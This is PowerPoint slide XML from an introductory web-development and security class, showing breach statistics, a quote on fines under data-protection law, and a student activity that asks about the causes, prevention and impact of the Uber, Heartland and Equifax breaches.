                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2016</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>57 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Users’ PII Leaked</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Billions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Lost in Valuation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3434606221"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057E20FC-2BA6-4219-9BC3-D4EAC75FB82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5334000"/>
            <a:ext cx="8737600" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“If the Uber breach happened in 2018…they would be subject </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to a fine of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>€20 million</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4% of global revenue.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod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5607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028BFD-AFBF-4EF2-AA2A-EDCADA19AAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this activity, you’ll research a few of the breaches mentioned in the previous slide. Read the articles at the following links, and answer the questions below. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We’ll discuss the questions after time, so be ready to share your answers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Articles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Uber Breach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://bit.ly/2p8t5fC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Heartland Payment Breach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://ubm.io/2CUYN9U</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Equifax Breach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://bit.ly/2x1axDI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What was the cause of each breach?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How could each breach have been prevented?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What was the impact of each leak? Include both user and financial impact.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4081C5-5AC8-4193-97CA-7B6CB059A5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Exposure on the Web (15 min.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1166507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518</TotalTime>
  <Words>7603</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>893</Paragraphs>
  <Slides>63</Slides>
  <Notes>53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Aller Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi Cond</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Trilogy_Class_Template</vt:lpstr>
      <vt:lpstr>Introduction to the Modern Web</vt:lpstr>
      <vt:lpstr>By the end of today’s class, you will be able to: </vt:lpstr>
      <vt:lpstr>Welcome to the Internet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Big Losses</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Structure of the Internet</vt:lpstr>
      <vt:lpstr>What We’ll Cover in This Section: </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Major Players</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>HTTP Revisited</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>When a client such as a web browser issues a request, it:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>cURL </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>cURL Commands</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Client-Side Resources</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anatomy of a Tag Rule</vt:lpstr>
      <vt:lpstr>Anatomy of a Class Rule</vt:lpstr>
      <vt:lpstr>Anatomy of an ID Rule</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A Cup of JavaScript</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Web and Security Concerns </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Same-Origin Policy and CORS</vt:lpstr>
      <vt:lpstr>What We’ll Cover in This Section: </vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Table</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Origin Resource Sharing (CORS)</vt:lpstr>
      <vt:lpstr>Preflight Headers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Preflighting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Inspector</vt:lpstr>
      <vt:lpstr>The Network Tab</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>By the end of today’s class, you will be able to: </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creator>ahaque89</dc:creator>
  <cp:lastModifiedBy>Ann John</cp:lastModifiedBy>
  <cp:revision>2421</cp:revision>
  <cp:lastPrinted>2016-01-30T16:23:56Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-20T17:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T23:28:42Z</dcterms:modified>
</cp:coreProperties>
</file>